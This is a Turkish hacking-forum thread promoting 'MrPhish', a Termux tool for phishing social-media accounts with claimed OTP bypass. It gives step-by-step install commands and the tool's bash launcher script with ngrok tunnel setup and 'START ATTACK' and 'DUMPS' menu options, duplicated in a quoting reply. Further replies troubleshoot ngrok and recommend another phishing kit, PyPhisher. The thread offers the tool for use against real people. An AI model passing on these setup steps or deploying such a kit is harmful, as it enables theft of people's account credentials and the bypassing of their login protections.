MrPhish [Termux]

Fełix

Katılımcı Üye
7 Ocak 2023
361
2
214
NightmareTales
Merhabalar Değerli Forum Üyeleri Bu Konuda Mükemmel Bir Phishing(Oltalama) Toolunu Göstericeğim
Not:Tool Test Edilmişdir Çalışıyor
Url: GitHub - noob-hackers/mrphish: All In One Social Accounts Phishing With Otp Bypass In Termux.

Tool Hakkında Bilgi:
[+] 60+ uptodate pages !
[+] Updated maintainence !
[+] 1 Port Forwarding Option !
[+] No link issues, timing !
[+] 5+ categories in pages !
[+] Easy for Beginners !


Kurulum
Kod:
$ apt-get update -y

$ apt-get upgrade -y

$ pkg install python -y

$ pkg install python2 -y

$ pkg install git -y

$ pip install lolcat

$ git clone https://github.com/noob-hackers/mrphish

$ cd $HOME

$ ls

$ cd mrphish

$ ls

$ bash setup

$ bash mrphish

Yazılımı:

Kod:
clear
check(){
if wget --spider https://raw.githubusercontent.com/noob-hackers/mrphish/master/update.v1.4 2>/dev/null; then
cd $HOME/mrphish/core/update
echo "hai" > update.txt
else
echo
fi
}
check
option(){
if [ -f "$HOME/mrphish/core/update/update.txt" ];then
cd $HOME/mrphish/core/update
bash update.sh
else
echo " "
fi
}
option
check1(){
if wget --spider https://raw.githubusercontent.com/noob-hackers/patchupdateznh/main/mrpshpatch.v.1 2>/dev/null; then
cd $HOME/mrphish/core/update
echo "hai" > patch.txt
else
echo
fi
}
check1
option1(){
if [ -f "$HOME/mrphish/core/update/patch.txt" ];then
cd $HOME/mrphish/core/update
bash patch.sh
else
echo " "
fi
}
option1
echo -e " \e[96m
                                 ████████ \e[0m"
echo "                             ████████████████
                               █─▄▀█──█▀▄─█
                              ▐▌──────────▐▌"
echo -e "\e[0m                              █▌\e[91m▀▄──▄▄──▄▀\e[0m▐█"
echo -e "\e[0m                             ▐██──\e[91m▀▀\e[91m──▀▀──\e[0m██"
echo "                            ▄████▄──▐▌──▄████▄"
echo -e "\e[91m
                 _  _  ____     ____  _  _  __  ____  _  _       
                ( \/ )(  _ \   (  _ \/ )( \(  )/ ___)/ )( \     
                / \/ \ )   / _  ) __/) __ ( )( \___ \) __ ("     
echo -e "\e[96m                \_)(_/(__\_)(_)(__)  \_)(_/(__)(____/\_)(_/\e[0m"
echo     
echo -e "                       \e[92m TOOL BY NOOB HACKERS (NITRO)\e[0m"
echo
wget -q --spider http://google.com

if [ $? -eq 0 ]; then
echo
echo -e "                             STATUS \e[1;96m[\e[0m\e[92mONLINE\e[0m\e[1;96m]"
echo
banner(){
echo -e "\e[96m                           MRPHISH NGROK SETUP\e[96m"
echo -e "\e[96m                        ╔═══════════════════════╗\e[0m"
echo -e "\e[91m                        ║\e[93m If you are using wifi\e[91m ║\e[0m"                                                             
echo -e "\e[91m                        ║         \e[93mType\e[92m 1\e[91m        ║\e[0m"
echo -e "\e[96m                        ║                       ║\e[91m"                                                                         
echo -e "\e[96m                        ║         (Or)          ║\e[96m"
echo -e "\e[96m                        ║                       ║\e[96m"
echo -e "\e[91m                        ║ \e[93mIf you are using data\e[91m ║\e[0m"             
echo -e "\e[91m                        ║         \e[93mType\e[92m 2\e[91m        ║\e[0m"
echo -e "\e[96m                        ║                       ║"
echo -e "\e[96m                        ╚═══════════════════════╝"
echo -n -e "\e[32mSELECT\e[96m[\e[33m1/2\e[96m]\e[33m: \e[0m"
read hulk
if [ $hulk = 1 ];then
cd $HOME/mrphish/core
rm ngrok > /dev/null 2>&1
unzip ngrok-wifi.zip > /dev/null 2>&1
chmod +x ngrok
elif [ $hulk = 2 ];then
cd $HOME/mrphish/core
rm ngrok > /dev/null 2>&1
unzip ngrok-data.zip > /dev/null 2>&1
chmod +x ngrok
else
echo "                                  !Error"
fi
}
banner
sleep 4.0
else
echo
    echo -e "                             STATUS \e[1;93m[\e[0m\e[91mOFFLINE\e[0m\e[1;93m]\e[0m"
echo
sleep 1.0
bash mrphish
fi 
clear
echo -e " \e[96m
                                 ████████ \e[0m"
echo "                             ████████████████
                               █─▄▀█──█▀▄─█
                              ▐▌──────────▐▌"
echo -e "\e[0m                              █▌\e[91m▀▄──▄▄──▄▀\e[0m▐█"
echo -e "\e[0m                             ▐██──\e[91m▀▀\e[91m──▀▀──\e[0m██"
echo "                            ▄████▄──▐▌──▄████▄"
echo -e "\e[91m
                 _  _  ____     ____  _  _  __  ____  _  _       
                ( \/ )(  _ \   (  _ \/ )( \(  )/ ___)/ )( \     
                / \/ \ )   / _  ) __/) __ ( )( \___ \) __ ("     
echo -e "\e[96m                \_)(_/(__\_)(_)(__)  \_)(_/(__)(____/\_)(_/\e[0m"
echo     
echo -e "                       \e[92m TOOL BY NOOB HACKERS (NITRO)\e[0m"
echo
echo -e "\e[96m        |-----------------------[V 1.3]-----------------------|"
echo -e "\e[96m        |-------------------\e[92mSELECT OPTIONS\e[96m--------------------|"
echo -e "\e[96m        |-----------------------------------------------------|"
echo -e "\e[96m        |                                                     |"
echo -e "\e[96m        |                                                     |"
echo -e "\e[96m        |                [\e[92m1\e[96m]==> START ATTACK                  |"
echo -e "\e[96m        |                [\e[92m2\e[96m]==> DUMPS                         |"
echo -e "\e[96m        |                [\e[92m3\e[96m]==> ABOUT                         |"
echo -e "\e[96m        |                [\e[92m4\e[96m]==> UPDATE                        |"
echo -e "\e[96m        |                [\e[92m5\e[96m]==> EXIT                          |"
echo -e "\e[96m        |                [\e[92m6\e[96m]==> SUBSCRIBE                     |"
echo -e "\e[96m        |                [\e[92m7\e[96m]==> CHECK SPEED                   |"
echo -e "\e[96m        |                [\e[92m8\e[96m]==> CHAT NOW                      |"
echo -e "\e[96m        |                                                     |"
echo -e "\e[96m        |-----------------------------------------------------|"
echo -e "\e[96m        |---------------------\e[91mHEY HACKER\e[96m----------------------|"
echo -e "\e[96m        |-----------------------------------------------------|"
read -p $'\n\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] SELECT OPTION: \e[0m' option
if [[ $option == 1 || $option == 01 ]]; then
echo
cd $HOME/mrphish/core
bash menu.sh
echo
elif [[ $option == 2 || $option == 02 ]]; then
echo
cd $HOME/mrphish/core/
bash show.sh
elif [[ $option == 3 || $option == 03 ]]; then
echo
cd $HOME/mrphish/core/about
bash about.sh
elif [[ $option == 4 || $option == 04 ]]; then
echo
cd $HOME/mrphish/core/update
bash update.sh
echo
elif [[ $option == 7 || $option == 07 ]]; then
echo
cd $HOME/mrphish/core
bash intspeed.sh
echo
elif [[ $option == 5 ]]; then
clear
printf "                    \e[1;96m Have A Good Day ........! \e[0m\n"
echo
sleep 3.0
exit 3
elif [[ $option == 6 || $option == 06 ]]; then
echo
clear
am start -a android.intent.action.VIEW -d https://bitly.com/nhytchannel
clear
echo
elif [[ $option == 8 || $option == 08 ]]; then
echo
clear
am start -a android.intent.action.VIEW -d https://bit.ly/nhwhatschat
else
printf "                \e[1;92m [!] Invalid option!\e[0m\n"
sleep 1
fi
echo
cd $HOME/mrphish
bash mr
Sonuç

i00d4lx.jpg
 
Son düzenleme:

ayarsizfedai

Katılımcı Üye
17 Şub 2019
376
4
177
root@kali :~
Merhabalar Değerli Forum Üyeleri Bu Konuda Mükemmel Bir Phishing(Oltalama) Toolunu Göstericeğim
Not:Tool Test Edilmişdir Çalışıyor
Url: GitHub - noob-hackers/mrphish: All In One Social Accounts Phishing With Otp Bypass In Termux.

Tool Hakkında Bilgi:
[+] 60+ uptodate pages !
[+] Updated maintainence !
[+] 1 Port Forwarding Option !
[+] No link issues, timing !
[+] 5+ categories in pages !
[+] Easy for Beginners !


Kurulum
Kod:
$ apt-get update -y

$ apt-get upgrade -y

$ pkg install python -y

$ pkg install python2 -y

$ pkg install git -y

$ pip install lolcat

$ git clone https://github.com/noob-hackers/mrphish

$ cd $HOME

$ ls

$ cd mrphish

$ ls

$ bash setup

$ bash mrphish

Yazılımı:

Kod:
clear
check(){
if wget --spider https://raw.githubusercontent.com/noob-hackers/mrphish/master/update.v1.4 2>/dev/null; then
cd $HOME/mrphish/core/update
echo "hai" > update.txt
else
echo
fi
}
check
option(){
if [ -f "$HOME/mrphish/core/update/update.txt" ];then
cd $HOME/mrphish/core/update
bash update.sh
else
echo " "
fi
}
option
check1(){
if wget --spider https://raw.githubusercontent.com/noob-hackers/patchupdateznh/main/mrpshpatch.v.1 2>/dev/null; then
cd $HOME/mrphish/core/update
echo "hai" > patch.txt
else
echo
fi
}
check1
option1(){
if [ -f "$HOME/mrphish/core/update/patch.txt" ];then
cd $HOME/mrphish/core/update
bash patch.sh
else
echo " "
fi
}
option1
echo -e " \e[96m
                                 ████████ \e[0m"
echo "                             ████████████████
                               █─▄▀█──█▀▄─█
                              ▐▌──────────▐▌"
echo -e "\e[0m                              █▌\e[91m▀▄──▄▄──▄▀\e[0m▐█"
echo -e "\e[0m                             ▐██──\e[91m▀▀\e[91m──▀▀──\e[0m██"
echo "                            ▄████▄──▐▌──▄████▄"
echo -e "\e[91m
                 _  _  ____     ____  _  _  __  ____  _  _      
                ( \/ )(  _ \   (  _ \/ )( \(  )/ ___)/ )( \    
                / \/ \ )   / _  ) __/) __ ( )( \___ \) __ ("    
echo -e "\e[96m                \_)(_/(__\_)(_)(__)  \_)(_/(__)(____/\_)(_/\e[0m"
echo    
echo -e "                       \e[92m TOOL BY NOOB HACKERS (NITRO)\e[0m"
echo
wget -q --spider http://google.com

if [ $? -eq 0 ]; then
echo
echo -e "                             STATUS \e[1;96m[\e[0m\e[92mONLINE\e[0m\e[1;96m]"
echo
banner(){
echo -e "\e[96m                           MRPHISH NGROK SETUP\e[96m"
echo -e "\e[96m                        ╔═══════════════════════╗\e[0m"
echo -e "\e[91m                        ║\e[93m If you are using wifi\e[91m ║\e[0m"                                                            
echo -e "\e[91m                        ║         \e[93mType\e[92m 1\e[91m        ║\e[0m"
echo -e "\e[96m                        ║                       ║\e[91m"                                                                        
echo -e "\e[96m                        ║         (Or)          ║\e[96m"
echo -e "\e[96m                        ║                       ║\e[96m"
echo -e "\e[91m                        ║ \e[93mIf you are using data\e[91m ║\e[0m"            
echo -e "\e[91m                        ║         \e[93mType\e[92m 2\e[91m        ║\e[0m"
echo -e "\e[96m                        ║                       ║"
echo -e "\e[96m                        ╚═══════════════════════╝"
echo -n -e "\e[32mSELECT\e[96m[\e[33m1/2\e[96m]\e[33m: \e[0m"
read hulk
if [ $hulk = 1 ];then
cd $HOME/mrphish/core
rm ngrok > /dev/null 2>&1
unzip ngrok-wifi.zip > /dev/null 2>&1
chmod +x ngrok
elif [ $hulk = 2 ];then
cd $HOME/mrphish/core
rm ngrok > /dev/null 2>&1
unzip ngrok-data.zip > /dev/null 2>&1
chmod +x ngrok
else
echo "                                  !Error"
fi
}
banner
sleep 4.0
else
echo
    echo -e "                             STATUS \e[1;93m[\e[0m\e[91mOFFLINE\e[0m\e[1;93m]\e[0m"
echo
sleep 1.0
bash mrphish
fi
clear
echo -e " \e[96m
                                 ████████ \e[0m"
echo "                             ████████████████
                               █─▄▀█──█▀▄─█
                              ▐▌──────────▐▌"
echo -e "\e[0m                              █▌\e[91m▀▄──▄▄──▄▀\e[0m▐█"
echo -e "\e[0m                             ▐██──\e[91m▀▀\e[91m──▀▀──\e[0m██"
echo "                            ▄████▄──▐▌──▄████▄"
echo -e "\e[91m
                 _  _  ____     ____  _  _  __  ____  _  _      
                ( \/ )(  _ \   (  _ \/ )( \(  )/ ___)/ )( \    
                / \/ \ )   / _  ) __/) __ ( )( \___ \) __ ("    
echo -e "\e[96m                \_)(_/(__\_)(_)(__)  \_)(_/(__)(____/\_)(_/\e[0m"
echo    
echo -e "                       \e[92m TOOL BY NOOB HACKERS (NITRO)\e[0m"
echo
echo -e "\e[96m        |-----------------------[V 1.3]-----------------------|"
echo -e "\e[96m        |-------------------\e[92mSELECT OPTIONS\e[96m--------------------|"
echo -e "\e[96m        |-----------------------------------------------------|"
echo -e "\e[96m        |                                                     |"
echo -e "\e[96m        |                                                     |"
echo -e "\e[96m        |                [\e[92m1\e[96m]==> START ATTACK                  |"
echo -e "\e[96m        |                [\e[92m2\e[96m]==> DUMPS                         |"
echo -e "\e[96m        |                [\e[92m3\e[96m]==> ABOUT                         |"
echo -e "\e[96m        |                [\e[92m4\e[96m]==> UPDATE                        |"
echo -e "\e[96m        |                [\e[92m5\e[96m]==> EXIT                          |"
echo -e "\e[96m        |                [\e[92m6\e[96m]==> SUBSCRIBE                     |"
echo -e "\e[96m        |                [\e[92m7\e[96m]==> CHECK SPEED                   |"
echo -e "\e[96m        |                [\e[92m8\e[96m]==> CHAT NOW                      |"
echo -e "\e[96m        |                                                     |"
echo -e "\e[96m        |-----------------------------------------------------|"
echo -e "\e[96m        |---------------------\e[91mHEY HACKER\e[96m----------------------|"
echo -e "\e[96m        |-----------------------------------------------------|"
read -p $'\n\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] SELECT OPTION: \e[0m' option
if [[ $option == 1 || $option == 01 ]]; then
echo
cd $HOME/mrphish/core
bash menu.sh
echo
elif [[ $option == 2 || $option == 02 ]]; then
echo
cd $HOME/mrphish/core/
bash show.sh
elif [[ $option == 3 || $option == 03 ]]; then
echo
cd $HOME/mrphish/core/about
bash about.sh
elif [[ $option == 4 || $option == 04 ]]; then
echo
cd $HOME/mrphish/core/update
bash update.sh
echo
elif [[ $option == 7 || $option == 07 ]]; then
echo
cd $HOME/mrphish/core
bash intspeed.sh
echo
elif [[ $option == 5 ]]; then
clear
printf "                    \e[1;96m Have A Good Day ........! \e[0m\n"
echo
sleep 3.0
exit 3
elif [[ $option == 6 || $option == 06 ]]; then
echo
clear
am start -a android.intent.action.VIEW -d https://bitly.com/nhytchannel
clear
echo
elif [[ $option == 8 || $option == 08 ]]; then
echo
clear
am start -a android.intent.action.VIEW -d https://bit.ly/nhwhatschat
else
printf "                \e[1;92m [!] Invalid option!\e[0m\n"
sleep 1
fi
echo
cd $HOME/mrphish
bash mr
Sonuç

i00d4lx.jpg
Elinize sağlık, deniyorum.
 

OmarTR2000

Katılımcı Üye
26 May 2022
354
3
121
Baku
Selam kanka, acaba ngrok'un termux için kurulumunu biliyormuydunuz?
Bide ngrok auth code istiyor
 

Fełix

Katılımcı Üye
7 Ocak 2023
361
2
214
NightmareTales
Bash setup diyince "ngrok auth code" istiyor anlamadım burayı
Sorun Çıkınca Ngrok İçin Bu Tool'u Kullanıyorum:


Bu Tool İşinize Yaramadıysa Veya Üşeniyorsanız PyPhisher Tool'unu Kullanın En İyi Ve Kullanımı Kolay Phishing Tool'udur

Kuruluma Burdan Göz Ata Bilirsiniz:

Konu içinde PyPhisher Bölümünde Kurulum Yazıyor Yinede Yapamıyorsanîz Özel Olarak Kodları Atayım
 

OmarTR2000

Katılımcı Üye
26 May 2022
354
3
121
Baku
Sorun Çıkınca Ngrok İçin Bu Tool'u Kullanıyorum:


Bu Tool İşinize Yaramadıysa Veya Üşeniyorsanız PyPhisher Tool'unu Kullanın En İyi Ve Kullanımı Kolay Phishing Tool'udur

Kuruluma Burdan Göz Ata Bilirsiniz:

Konu içinde PyPhisher Bölümünde Kurulum Yazıyor Yinede Yapamıyorsanîz Özel Olarak Kodları Atayım
Teşekkürler hocam
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.